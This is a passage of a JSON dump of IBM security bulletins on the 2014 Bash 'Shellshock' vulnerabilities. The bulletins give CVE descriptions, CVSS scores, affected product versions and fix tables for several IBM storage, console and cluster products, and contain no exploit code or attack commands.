\",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"STMKTF\",\"label\":\"SAN06B-R (2498-R06)\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"STMKS2\",\"label\":\"SAN24B-4 Switch (2498-B24)\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"STMKSH\",\"label\":\"SAN40B-4 Switch (2498-B40)\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"STMKSX\",\"label\":\"SAN80B-4 Switch (2498-B80)\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}}] \n\n## Product Synonym\n\nSAN", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-18T17:59:03", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect IBM SAN b-type Switches (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2021-12-18T17:59:03", "id": "EE50B1A5AF778319698593697BE11C93BF03E19DEE9CE25FF7BD2F12582783CA", "href": "https://www.ibm.com/support/pages/node/706947", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:12:44", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by Power Hardware Management Console.\n\n## Vulnerability Details\n\n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_http://xforce.iss.net/xforcesur/xfdb/96153_**](<http://xforce.iss.net/xforce/xfdb/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_http://xforce.iss.net/xforce/xfdb/96209_**](<http://xforce.iss.net/xforce/xfdb/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96237_](<http://xforce.iss.net/xforce/xfdb/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96238_](<http://xforce.iss.net/xforce/xfdb/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96686_](<http://xforce.iss.net/xforce/xfdb/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n[**CVE-ID**:_ __CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96687_](<http://xforce.iss.net/xforce/xfdb/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nPower HMC Version 7 R7.3.0 \nPower HMC Version 7 R7.6.0 \nPower HMC Version 7 R7.7.0 \nPower HMC Version 7 R7.8.0 \nPower HMC Version 7 R7.9.0 \nPower HMC Version 8 R8.1.0\n\n## Remediation/Fixes\n\nThe Following fixes are available on IBM Fix Central at <http://www-933.ibm.com/support/fixcentral/> \n \n\n\n**Product**| **VRMF**| **APAR**| **Remediation/First Fix (PTF)** \n---|---|---|--- \nPower HMC| Version 7 R7.3.0 SP6| MB03857| MH01475 \nPower HMC| Version 7 R7.6.0 SP3| MB03852| MH01470 \nPower HMC| Version 7 R7.7.0 SP1 | MB03861| MH01479 \nPower HMC| Version 7 R7.7.0 SP2| MB03862| MH01480 \nPower HMC| Version 7 R7.7.0 SP4| MB03853| MH01471 \nPower HMC| Version 7 R7.8.0 SP1| MB03854| MH01472 \nPower HMC| Version 7 R7.9.0 SP1| MB03855| MH01473 \nPower HMC| Version 8 R8.1.0 SP1| MB03856| MH01474 \nPower HMC| Older V7 releases not listed above| N/A| Please update to supported releases listed above. \n \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n\n## Workarounds and Mitigations\n\nNone Known\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n05 October 2014: Original Version Published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SSB6AA\",\"label\":\"Power System Hardware Management Console Physical Appliance\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\"HMC\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB08\",\"label\":\"Cognitive Systems\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T01:31:39", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect Power Hardware Management Console (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2021-09-23T01:31:39", "id": "906C6E45A71E8A432DE51C6A94712DDA0BBA3529963A8AFA9DCFE84E05DA7425", "href": "https://www.ibm.com/support/pages/node/645653", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T21:58:28", "description": "## Summary\n\nInformation about security vulnerabilities affecting multiple products shipped as components of Intelligent Cluster has been published in security bulletins.\n\n## Vulnerability Details\n\n## Abstract\n\nInformation about security vulnerabilities affecting multiple products shipped as components of Intelligent Cluster has been published in security bulletins.\n\n## Content\n\n**Vulnerability Details:**\n\nPlease consult the security bulletins below for vulnerability details and information about fixes:\n\n * [ Intel Xeon Phi PCIe adapters](<http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096503>)\n * Mellanox SX6536, SX6036, and SX1036\n * [ IBM Flex System FC3171 8Gb SAN Switch](<http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096678>)\n * [ IBM Flex System EN6131 40Gb Ethernet Switch](<http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5096533>)\n * [ IBM Flex System IB6131 Infiniband Switch](<http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5096533>)\n * [Storwize V3700](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004897>)\n * [ IBM Flex System FC5022 16Gb SAN Switch](<https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ibm_flex_system_fc5022_16gb_san_scalable_switch_fc5022_24_port_16gb_esb_san_scalable_switch_fc5022_24_port_16gb_san_scalable_switch_and_two_16gb_fc_sfps_firmware_is_affected_by_the_following_openssl_vulnerabilities?lang=en_us>)\n * [ DDN SFA12000 and SFA7700](<http://www.ddn.com/download/tech-support-bulletins/hot-bulletins/SFA%20OS%20Mandatory%20Upgrades%20Fix%20Shellshock%20BASH%20Bug.pdf?89d02a>)\n * Intel True Scale 12000 Series Switches\n * [ IBM SAN24B Series Switches](<http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CCwQFjAC&url=http%3A%2F%2Fwww.brocade.com%2Fdownloads%2Fdocuments%2Ftechnical_support_bulletins%2Fbrocade-assessment-bashabug-vulnerability.pdf&ei=BIDbVLjgLs31oASn44DAAg&usg=AFQjCNHJH46mCrLvDsXKFyxZIVqW_YJ46Q&bvm=bv.85761416,d.aWw&cad=rja>)\n\nNote: Not all supported products have a corresponding security bulletin.\n\n## Affected products and versions\n\nAffected Supporting Product | Fix Version | Intelligent Cluster Best Recipe \n---|---|--- \nIntel Xeon Phi PCIe | 3.3.2 | 14B (01/2015) \nMellanox SX6536, SX6036, and SX1036 | 3.4.0012 | 14B (01/2015) \nIBM Flex System FC3171 | 9.1.3.05.00c | 14B (01/2015) \nIBM Flex System EN6131 | 3.4.0000 | 14B (01/2015) \nIBM Flex System IB6131 | 3.4.0000 | 14B (01/2015) \nIBM Flex System FC5022 | 7.2.1c1 | 14B (01/2015) \nIntel True Scale 12000 Series Switches | 7.3.0.0.15 | 14B (01/2015) \nDDN SFA12000 and SFA7700 | 2.2.1.3-21587 | 14B (01/2015) \nStorwize V3700 | 7.3.0.8 | 14B (01/2015) \nIBM SAN 24B Series Switches | 7.2.1d | 14B (01/2015) \n \n## Remediation/Fixes:\n\nSee Fix Versions in the table above.\n\nThe Intelligent Cluster Best Recipe 14B in Fix Central includes Mellanox OFED for IBM. See also [ http://www.mellanox.com/page/firmware_table_IBM_Intelligent_Clusters](<http://www.mellanox.com/page/firmware_table_IBM_Intelligent_Clusters>).\n\n## Workaround(s) & Mitigation(s):\n\nNone\n\nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information.\n\n**Related Information:** \n[IBM Secure Engineering Web Portal](<http://www-01.ibm.com/software/test/wenses/security/>) \n[IBM Product Security Incident Response Blog](<https://www.ibm.com/blogs/PSIRT>) \n\n\n**Acknowledgement**\n\nNone\n\n**Change History** \n11 February 2015: Added DDN, FC5022, Intel True Scale, SAN 24B, and updated Mellanox \n12 January 2015: Original Copy Published\n\n* The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Flash.\n\n**Disclaimer**\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOn \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n## Operating System\n\nSystem x Integrated Solutions:Operating system independent / None\n\n[{\"Type\":\"HW\",\"Business Unit\":{\"code\":\"BU016\",\"label\":\"Multiple Vendor Support\"},\"Product\":{\"code\":\"HWC20\",\"label\":\"System x Integrated Solutions->Intelligent Cluster\"},\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Line of Business\":{\"code\":\"\",\"label\":\"\"}}]", "cvss3": {}, "published": "2019-01-31T01:45:01", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect multiple products shipped with Intelligent Cluster (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2019-01-31T01:45:01", "id": "A6C5FDEF17751F9D6EC0D701C42B168DAF0AFD9B01217970935FD1F4EB568753", "href": "https://www.ibm.com/support/pages/node/866188", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-04T12:41:59", "description": "## Summary\n\nIBM FlashSystem 710, 720, 810, and 820 systems and RamSan 710, 720, 810, and 820 systems are not vulnerable to the Bash vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and the two memory corruption vulnerabilities.\n\n## Vulnerability Details\n\nIBM FlashSystem 710, 720, 810, and 820 systems and RamSan 710, 720, 810, and 820 systems are in all editions and all platforms **NOT** vulnerable to the Bash vulnerabilities (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278). \n\nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\nSeptember 30, 2014: original version published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SSXT4V\",\"label\":\"IBM FlashSystem 710\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"SSB0EG\",\"label\":\"IBM FlashSystem 720\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"SSMNZ09\",\"label\":\"IBM FlashSystem 810\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"SSZZUP\",\"label\":\"IBM FlashSystem 820\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"STZHMW\",\"label\":\"Flash Storage-\\u003ERamSan-710\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"STZHP2\",\"label\":\"Flash Storage-\\u003ERamSan-720\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"STZHNL\",\"label\":\"Flash Storage-\\u003ERamSan-810\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"STZHPG\",\"label\":\"Flash Storage-\\u003ERamSan-820\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T16:28:24", "type": "ibm", "title": "Security Bulletin: IBM FlashSystem 710, 720, 810, and 820 systems and RamSan 710, 720, 810, and 820 systems are not affected by the Bash vulnerabilities (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278)\nFlash", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-04-11T16:28:24", "id": "6964DC74D7C00F0076CE970FCDCD238B596005A3E74FD77729ECDADA86E693C4", "href": "https://www.ibm.com/support/pages/node/690011", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:13:16", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by IBM SmartCloud Entry appliance.\n\n## Vulnerability Details\n\nCVE-ID: [CVE-2014-6271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96153> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \nCVE-ID: [CVE-2014-7169](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \nDESCRIPTION: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the 